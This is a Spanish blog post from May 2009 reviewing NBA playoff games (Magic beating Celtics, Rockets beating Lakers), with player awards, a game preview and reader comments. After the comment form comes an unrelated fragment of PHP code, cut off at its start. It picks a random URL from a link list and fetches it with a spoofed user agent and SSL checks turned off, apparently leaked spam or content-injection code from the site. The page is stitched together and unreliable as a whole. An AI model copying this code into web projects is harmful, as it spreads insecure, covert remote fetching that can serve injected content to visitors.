Playoffs (04/05/2009): Quien pega primero…

05 de May de 2009 por TheDeerHunter

Traspiés en casa de los dos finalistas del año pasado. Como “buenos amigos” que son, se pusieron de acuerdo para tirar por la borda la ventaja campo que tanto trabajo les ha costado conseguir y si me apuras por poco también se ponen de acuerdo en los puntos …

Empezaron los Celtics y al descanso ya iban perdiendo de casi 20 puntos. Ray Allen le ha pillado el gustillo a eso de empezar tranquilo las eliminatorias. Tampoco está mal que se tome un descanso el killer pero es alucinante el partido tan malo que se marcó tras la que montó en primera ronda. Y tampoco Pierce o Rondo estuvieron finos. Definitivamente, no era el día de los verdes.

En realidad, más allá de lo que indica el marcador, fue un partido bastante plácido de Orlando. Sin desplegar un juego deslumbrante controlaron casi por completo el partido y sólo el coraje de los locales les permitió maquillar el resultado. Buen partido colectivo de los Magic, sin alardes.

En la acera de enfrente, los Lakers se despertaron del sueño de que lo tienen todo hecho de aquí a la final. Sufrir, sufrir y sufrir… pero estos Lakers no están demasiado hechos para eso. Todo el partido a remolque, manteniéndose a base de arreones de genio y calidad. El tiro exterior colapsado, la lata de Houston cerrada y la defensa de Lakers completamente superada. Extraordinario partido de Yao, que tras comerse con patatas a Bynum, Pau y cualquier defensa de ayudas que se le pusiese en frente, dio el susto de la noche en un choque de Kobe contra su rodilla derecha. Artest también estuvo soberbio, inteligentísimo, como Aaron Brooks que llevó por la calle de la amargura al pobre Fisher.

Tampoco fue el partido de los Lakers. Sólo Kobe se salvó de la mediocridad pero en ocasiones fue para lanzar ataques improvisados, sin un plan establecido. El resto no hubo manera de que le echaran una mano, ni Pau, ni Bynum… ni desde luego el banco. Inoperantes, ya en el tercer cuarto deberían haber tenido completamente perdido el partido, pero incluso así lograron ponerse por delante en el último. Todo un espejismo.

Mención a parte para Phil Jackson. Extremadamente desapegado con el partido, como si con él no fuera la cosa. Probablemente así es, ya que no tiene que demostrar nada, pero no debería ser razón para mostrar una apatía que se transmite a sus jugadores y al público. Objetivamente no estuvo acertado con los cambios. Farmar, por ejemplo, mereció algún minuto más y Vujacic… alguno menos. Debería haber encontrado tambiñen alguna solución defensiva a la sangría… La presión en toda la cancha contra Brooks fue de risa.

Esto no ha hecho más que empezar.

PREMIOS

MVP: Día de pívots. Dwight Howard se hizo amo y señor de la zona con 16 puntos, 22 rebotes y 3 tapones y Yao Ming se comió a todo el que se intentó pararle con 28 puntos y 10 rebotes.

Rookie: ¿Algun rookie en la sala? ¿No?

Sorpresa: Su papel en la anterior eliminatoria ya había sido clave pero Aaron Brooks no ha dejado de demostrar que es esencial en el entramado ofensivo de estos Rockets. 19 puntos para él.

Decepción: Llegó la hora de Andrew Bynum pero aunque no lo hizo mal ofensivamente en los minutos que estuvo en pista (10 puntos) sus problemas de faltas hicieron que sólo pudiera disputar 15 minutos.

Esfuerzo en vano: Kobe Bryant se exprimió al máximo pero no pudo alzarse con la victoria. 31 puntos y 8 rebotes conseguidos en arreones de genio y talento.

RAZONES PARA TRASNOCHAR

– Atlanta @ Cleveland (2.00h): Casi 10 días después del último partido los Cavs vuelven a saltar a una cancha y lo hacen contra un equipo que apenas ha tenido 2 días para recuperarse de una dura 1ª ronda. Los Hawks no consiguieron parar del todo a Wade. ¿Podrán hacerlo con Lebron?

– Dallas @ Denver (4.30h): Segundo asalto de un duelo que seguro será apasionante. Billups-Melo contra Kidd-Nowitki (y Nene y Howard pululando por ahí). Espectáculo asegurado.

Comenta

7 comentarios a esta entrada

  1. Txusma dice:
    #1

    Pues yo me he quedado sin habla cuando en la radio han dicho q los Lakers de Gasol (sic) habia perdido el primer partido. No me lo esperaba de ningun modo…

      Citar

  2. TheDeerHunter dice:
    #2

    si hubieras visto el partido te lo hubieras esperado del todo…

    por cierto, en esa foto Yao parece otro. Ya me estrañaba a mí que el verdadero se hubiera marcado un partido tan perfecto.

      Citar

  3. MagicJohnson32 dice:
    #3

    A mí no me sorprende la victoria de los Rockets. Los Rockets son un buen equipo que llega sin presión y que dispone de recursos que complican la vida a los Lakers. Además, LAL llegan con una cierta crisis de identidad por el regreso de Bynum, quien está realmente lejos de su mejor estado de forma. Da la impresión de que los Lakers están tanteándose, a ver a qué les conviene jugar, casi como en pretemporada. También está el cambio en el PG suplente, con la aparición de Shannon Brown. Quiero decir, ahora mismo hay dudas, los roles no están tan definidos como deberían y ante equipos sólidos como Houston, se paga.
    Y Pau anda fundido. Tenía que pasar…

      Citar

  4. arivas dice:
    #4

    Pues huele a series duras para los finalistas del año pasado. Yo apostaría que Boston cae.

    Y esta noche esperemos que Atlanta ponga en algun apuro a Lebron y cia, después del pasea contra Detroit.

      Citar

  5. aro_pasado_no_newtoniano dice:
    #5

    Sí que parece Pau fundido y más con un Bynum al que le cuesta contenerse/se la tienen jurada los arbitros.

    DJ Mbenga´s time??

      Citar

  6. couxe dice:
    #6

    Los Lakers son un equipo de lo más impredecible… Lo de ayer, si bien es algo inesperado, tampoco me soprende tanto… Los Rockets son un buen equipo, sobre todo incómodo, cosa que jode sobremanera a los amarillos, y tienen armas para defender y atacar a cualquiera, más si tiene el día Yao…
    Ahora con el factor cancha a favor y la moral por las nubes, y con gente tan competitiva como Scola o Artest, pueden poner en serios problemas a los Lakers alargando al máximo la serie…
    Ahora bien, tampoco sería extraño que no llegasen a más de 2 victorias, o que incluso se llevasen 4 del tirón, si los Lakers tras este aviso se dejarán de tonterías…

      Citar

  7. Viru dice:
    #7

    Acabo de verlo (con retraso) e impresionante Yao, no había quien pudiera con él. En general está cuajando unos play-offs muy sólidos, a ver cuanto aguanta el pobre.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>